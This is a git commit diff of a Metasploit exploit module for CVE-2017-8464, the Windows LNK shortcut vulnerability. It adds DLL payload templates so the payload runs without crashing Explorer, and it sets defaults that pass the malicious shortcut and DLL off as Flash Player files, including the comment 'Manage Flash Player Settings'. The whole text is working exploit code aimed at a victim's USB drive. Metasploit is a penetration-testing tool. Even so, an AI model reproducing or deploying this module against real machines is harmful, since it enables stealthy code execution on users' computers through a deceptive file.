Added new DLL templates to prevent crashing of Explorer
parent
67dddd2402
commit
e51e1d9638
Binary file not shown.
Binary file not shown.
|
@ -59,8 +59,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('FILENAME', [false, 'The LNK file']),
|
||||
OptString.new('DLLNAME', [false, 'The DLL file containing the payload']),
|
||||
OptString.new('FILENAME', [false, 'The LNK file', 'Flash Player.lnk']),
|
||||
OptString.new('DLLNAME', [false, 'The DLL file containing the payload', 'FlashPlayerCPLApp.cpl']),
|
||||
OptString.new('DRIVE', [false, 'Drive letter assigned to USB drive on victim\'s machine'])
|
||||
])
|
||||
|
||||
|
@ -71,6 +71,14 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
opts = {}
|
||||
if target['Arch'] == ARCH_X64
|
||||
datastore['EXE::Path'] = ::File.join(Msf::Config.data_directory, 'exploits/cve-2017-8464')
|
||||
datastore['EXE::Template'] = ::File.join(Msf::Config.data_directory, 'exploits/cve-2017-8464', 'template_x64_windows.dll')
|
||||
else
|
||||
datastore['EXE::Path'] = ::File.join(Msf::Config.data_directory, 'exploits/cve-2017-8464')
|
||||
datastore['EXE::Template'] = ::File.join(Msf::Config.data_directory, 'exploits/cve-2017-8464', 'template_x86_windows.dll')
|
||||
end
|
||||
dll = generate_payload_dll
|
||||
dll_name = datastore['DLLNAME'] || "#{rand_text_alpha(16)}.dll"
|
||||
dll_path = store_file(dll, dll_name)
|
||||
|
@ -102,7 +110,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
def generate_link(path)
|
||||
path << "\x00"
|
||||
display_name = "Flash Player\x00" # LNK Display Name
|
||||
comment = "\x00"
|
||||
comment = "Manage Flash Player Settings\x00"
|
||||
|
||||
# Control Panel Applet ItemID with our DLL
|
||||
cpl_applet = [
|
||||
|
|
Loading…
Reference in New Issue